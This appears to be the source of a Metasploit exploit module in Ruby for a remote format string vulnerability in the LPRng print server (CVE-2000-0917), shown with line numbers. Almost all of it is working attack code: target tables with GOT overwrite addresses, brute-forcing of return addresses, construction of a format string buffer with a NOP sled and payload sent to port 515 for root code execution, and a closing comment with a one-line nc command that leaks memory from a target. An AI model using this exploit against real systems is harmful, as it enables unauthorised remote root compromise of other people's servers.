Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::Tcp
10
  include Msf::Exploit::Brute
11
  include Msf::Exploit::FormatString
12

13
  def initialize(info = {})
14
    super(update_info(info,
15
      'Name'           => 'LPRng use_syslog Remote Format String Vulnerability',
16
      'Description'    => %q{
17
          This module exploits a format string vulnerability in the LPRng print server.
18
        This vulnerability was discovered by Chris Evans. There was a publicly
19
        circulating worm targeting this vulnerability, which prompted RedHat to pull
20
        their 7.0 release. They consequently re-released it as "7.0-respin".
21
      },
22
      'Author'         => [ 'jduck' ],
23
      'License'        => MSF_LICENSE,
24
      'References'     =>
25
        [
26
          [ 'CVE', '2000-0917' ],
27
          [ 'OSVDB', '421' ],
28
          [ 'BID', '1712' ],
29
          [ 'US-CERT-VU', '382365' ],
30
          [ 'URL', 'http://www.cert.org/advisories/CA-2000-22.html' ],
31
          [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=17756' ],
32
          [ 'EDB', '226' ],
33
          [ 'EDB', '227' ],
34
          [ 'EDB', '230' ]
35
        ],
36
      'Platform'       => 'linux',
37
      'Arch'           => ARCH_X86,
38
      'Privileged'     => true, # root
39
      'DefaultOptions' =>
40
        {
41
          'PrependSetresuid' => true
42
        },
43
      'Payload'        =>
44
        {
45
          'Space'    => 130, # buffer size on caldera is 180! (need ~50 for fmt)
46
          'BadChars' => "\x00\x0a\x20\x25",
47
        },
48
      'Targets'        =>
49
        [
50
          # tested OK - jjd
51
          [ 'Caldera OpenLinux 2.3 Bruteforce',
52
            {
53
              'Platform'   => 'linux',
54
              'NumPops'    => 243,
55
              'FlowHook'   => 0x80992d4,  # GOT of exit
56
              # (0x809c180+(41+4+10+48)) - data segment, but gets corrupted
57
              'Bruteforce' =>
58
                {
59
                  'Start' => { 'Ret' => 0xcffffff4 },
60
                  'Stop'  => { 'Ret' => 0x7fffe004 },
61
                  'Step'  => 16
62
                }
63
            }
64
          ],
65
=begin
66
          # untested (from public exploits)
67
          [ 'Slackware 7.0 LPRng-3.6.22.tgz - started from shell',
68
            {
69
              'NumPops' 	=> 299,
70
              'Ret' 	   => 0xbffff640,
71
              'FlowHook'	=> 0xbfffee30
72
            }
73
          ],
74
          [ 'RedHat 7.0 (Guinness) with LPRng-3.6.22/23/24-1 from rpm - glibc-2.2-5',
75
            {
76
              'NumPops' 	=> 304,
77
              'Ret' 	   => 0xbffff920,
78
              'FlowHook'	=> 0xbffff0f0
79
            }
80
          ],
81
          [ 'RedHat 7.0 - Guinesss',
82
            {
83
              'NumPops' 	=> 300,
84
              'Ret' 	   => 0x41424344,
85
              'FlowHook'	=> 0xbffff3ec
86
            }
87
          ],
88
          [ 'RedHat 7.0 - Guinesss-dev',
89
            {
90
              'NumPops' 	=> 300,
91
              'Ret' 	   => 0x41424344,
92
              'FlowHook'	=> 0xbffff12c
93
            }
94
          ],
95
=end
96
          # ...
97
          [ 'Debug',
98
            {
99
              'NumPops' 	=> 1, # sure to miss.
100
              'Ret' 	   => 0x41424344,
101
              'FlowHook'	=> 0x45464748
102
            }
103
          ]
104
        ],
105
      # 'DefaultTarget' => 0,
106
      'DisclosureDate' => '2000-09-25'))
107

108
    register_options( [ Opt::RPORT(515) ])
109
  end
110

111

112
  def exploit
113
    # we want to use DPA for this one :)
114
    fmtstr_set_caps(false, true)
115

116
    # check syslog to see which number hits 41414141
117
=begin
118
    400.times { |x|
119
      connect
120
      buf = "aAAAABBBB|%%%u$x|%u\n" % [x+1, x+1]
121
      sock.put(buf)
122
      #handler
123
      disconnect
124
    }
125
=end
126
    print_status("Trying target #{target.name} ..")
127

128
    super
129
  end
130

131

132
  def brute_exploit(addrs)
133

134
    #print_status("Trying target #{target.name} - addr 0x%x..." % addrs['Ret'])
135

136
    printed = "Service_connection: bad request line '\\35" # + "'XXXYYYYZZZZ...
137
    num_start = printed.length + 2 + 4
138

139
    # write 'ret' addr to flowhook (execute shellcode)
140
    # NOTE: the resulting two writes must be done at the same time
141

142
    # characters (chr(10) > X > chr(99)) will screw up alignment (\XXX in syslog)
143
    fmtbuf = "_" * 4
144
    fmtbuf << generate_fmt_two_shorts(num_start, target['FlowHook'], addrs['Ret'])
145
    #print_status(" hijacker format string buffer is #{fmtbuf.length} bytes")
146

147
    # append payload and newline
148
    #fmtbuf << payload.encoded
149
    fmtbuf << "\x90" * 32
150
    fmtbuf << Rex::Text.charset_exclude(payload_badchars)
151
    fmtbuf << "\n"
152

153
    print_status(" writing 0x%x to 0x%x" % [addrs['Ret'], target['FlowHook']])
154

155
    connect
156
    #print_status("Sleeping, attach now!!")
157
    #select(nil,nil,nil,5)
158

159
    sock.put(fmtbuf)
160

161
    handler
162
    disconnect
163

164
  end
165
end
166

167

168
=begin
169

170
HRM!
171

172
The following causes info leakage!
173

174
bash$ ( ruby -e 'puts "\x09" + ("%x" * 50) + "\n"'; cat) | nc 192.168.0.120 515 | hexdump -vC
175

176
There are various other ways to trigger the vulnerability. LPD uses the single-byte commands
177
0x01 -> 0x09...
178

179
It's unclear if there is a way to auto-detect the lpd version via LPD commands.
180

181
=end
182

183